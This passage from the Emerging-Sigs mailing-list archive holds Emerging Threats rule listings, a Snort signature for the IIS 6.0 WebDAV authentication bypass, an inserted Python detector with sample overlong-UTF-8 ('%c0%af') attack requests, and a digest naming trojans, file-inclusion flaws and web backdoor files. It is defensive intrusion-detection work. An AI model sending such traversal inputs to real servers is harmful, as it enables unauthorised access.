Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500145 || ET COMPROMISED Known Compromised or Hostile Host Traffic (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500146 || ET COMPROMISED Known Compromised or Hostile Host Traffic (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500147 || ET COMPROMISED Known Compromised or Hostile Host Traffic (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500148 || ET COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500149 || ET COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic (153) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510094 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510121 || ET COMPROMISED 
Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510148 || ET COMPROMISED 
From randolphdavidn at gmail.com Sat May 16 17:13:08 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Sat, 16 May 2009 17:13:08 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
Message-ID:

I'm submitting this for the recent IIS 6.0 vulnerability
http://isc.sans.org/diary.html?storyid=6397

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; nocase; reference:url,isc.sans.org/diary.html?storyid=6397; sid:xxxxxx; gid:1; rev:1;)

I also read that "translate: f" was required but the information on milw0rm.com did not use that in all 3 examples.
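As an added example (not from the post above or the Emerging Threats ruleset), the following Python check mirrors what the submitted rule matches on, the percent-encoded bytes "%c0%af" in the request URI with `nocase`, and extends it in two ways a sensor operator would want: it also tests the percent-decoded URI, since an inspector that normalises URIs before matching sees the decoded bytes rather than the literal "%c0%af", and it generalises to any 2-byte sequence led by 0xC0 or 0xC1, which is always overlong UTF-8 and never legitimate. The sample requests and host name are constructed; the "Translate: f" header is recorded as a secondary indicator because the post mentions it.

```python
"""Added check mirroring the IIS 6.0 WebDAV auth-bypass rule above.

Constructed example; not part of the mailing-list post or the ET ruleset.
The rule looks for the literal, percent-encoded "%c0%af" in the request URI
with `nocase`.  This check does the same, then also looks at the decoded
URI, and treats any 0xC0/0xC1-led 2-byte sequence as overlong UTF-8 (such a
sequence encodes a code point that fits in a single byte, so it is never
valid; %c0%af is the overlong form of "/").
"""
import re
from urllib.parse import unquote_to_bytes

# Percent-encoded form: %c0 or %c1 followed by an encoded continuation byte
# (0x80-0xBF).  re.IGNORECASE mirrors the rule's `nocase` (matches %C0%AF).
OVERLONG_PCT = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)
# Decoded form: the same sequence as raw bytes.
OVERLONG_RAW = re.compile(rb"[\xc0\xc1][\x80-\xbf]")


def parse_request(raw: bytes):
    """Return (method, uri, headers) from the head of an HTTP request.

    Header names are lower-cased and values stripped; deliberately minimal.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    method = parts[0].decode("ascii", "replace")
    uri = parts[1]
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().lower().decode("ascii", "replace")] = (
                value.strip().decode("latin-1")
            )
    return method, uri, headers


def inspect_request(raw: bytes) -> dict:
    """Apply the overlong-UTF-8 and Translate header checks to one request."""
    method, uri, headers = parse_request(raw)
    percent_hit = OVERLONG_PCT.search(uri.decode("latin-1")) is not None
    decoded_hit = OVERLONG_RAW.search(unquote_to_bytes(uri)) is not None
    translate_f = headers.get("translate", "").lower() == "f"
    return {
        "method": method,
        "overlong_percent_encoded": percent_hit,  # what the literal rule sees
        "overlong_after_decode": decoded_hit,     # what a URI normaliser sees
        "translate_f": translate_f,
        "alert": percent_hit or decoded_hit,
    }


# Constructed sample requests; the host name is a placeholder.
SAMPLES = {
    "encoded_lower": (b"GET /%c0%afdocs/ HTTP/1.1\r\n"
                      b"Host: www.example.test\r\nTranslate: f\r\n\r\n"),
    "encoded_upper": (b"GET /%C0%AFdocs/ HTTP/1.1\r\n"
                      b"Host: www.example.test\r\n\r\n"),
    # Same bytes sent raw rather than percent-encoded: the literal
    # "%c0%af" match misses this, the decoded check catches it.
    "raw_bytes":     (b"GET /\xc0\xafdocs/ HTTP/1.1\r\n"
                      b"Host: www.example.test\r\n\r\n"),
    # Valid 2-byte UTF-8 (U+00E9) must not be flagged.
    "valid_utf8":    (b"GET /caf%c3%a9/ HTTP/1.1\r\n"
                      b"Host: www.example.test\r\n\r\n"),
    "benign":        (b"GET /index.html HTTP/1.1\r\n"
                      b"Host: www.example.test\r\n\r\n"),
}


def run_samples() -> dict:
    """Inspect every constructed sample and return name -> verdict."""
    return {name: inspect_request(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:14s} {verdict}")
```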
From emerging at emergingthreats.net Sat May 16 18:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 16 May 2009 18:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090516220010.BB5A24504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat May 16 18:00:10 2009 [***]

[+++] Added rules: [+++]

2002920 - ET POLICY VNC Authentication Failure (emerging-policy.rules)
2002922 - ET POLICY VNC Authentication Successful (emerging-policy.rules)
2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)
2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules)
2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules)
2009349 - ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)
2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)
2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules)

[///] Modified active rules: [///]

2001621 - ET WEB Exploit Suspected PHP Injection Attack (emerging-web_sql_injection.rules)
2001810 - ET WEB Explit PHP remote file include exploit attempt (emerging-web_sql_injection.rules)
2002838 - ET WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules)
2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)
2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
2007611 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 (emerging-virus.rules)
2007612 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 (emerging-virus.rules)
2007613 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 (emerging-virus.rules)
2007614 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 (emerging-virus.rules)
2007950 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body (emerging-virus.rules)
2008142 - ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) (emerging-virus.rules)
2008189 - ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin (emerging-virus.rules)
2008278 - ET TROJAN Generic Raider Obfuscated VBScript (emerging-virus.rules)
2008379 - ET TROJAN Swizzor Checkin (kgen_up) (emerging-virus.rules)
2008973 - ET TROJAN onmuz.com Infection Activity (emerging-virus.rules)
2009126 - ET TROJAN Possible bot C&C Checkin (emerging-virus.rules)
2009156 - ET TROJAN Unknown Dropper Checkin (emerging-virus.rules)
2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)
2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules)
2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules)
2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules)
2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
